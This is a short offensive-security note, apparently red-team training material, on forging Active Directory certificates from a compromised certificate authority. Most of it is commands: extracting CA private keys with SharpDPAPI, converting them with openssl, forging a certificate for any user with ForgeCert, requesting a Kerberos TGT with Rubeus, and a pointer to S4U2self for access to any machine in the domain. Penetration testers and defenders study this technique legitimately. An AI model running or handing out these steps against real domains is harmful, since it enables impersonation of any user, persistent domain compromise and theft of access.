Forged Certificates

(on a CA, in this case the DC)

Obtain private keys

SharpDPAPI.exe certificates /machine

Save the private key and certificate to a .pem file and convert it to a .pfx with openssl

Then, build the forged certificate with ForgeCert

ForgeCert.exe --CaCertPath .\Desktop\sub-ca.pfx --CaCertPassword pass123 --Subject "CN=User" --SubjectAltName "[email protected]" --NewCertPath .\Desktop\fake.pfx --NewCertPassword pass123

Request Rubeus for legitimate TGT with forged cert

Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /enctype:aes256 /certificate:MIACAQ[...snip...]IEAAAA /password:pass123 /nowrap

Combine this with the S4U2self trick to gain access to any machine or service in the domain.

Last updated 2 years ago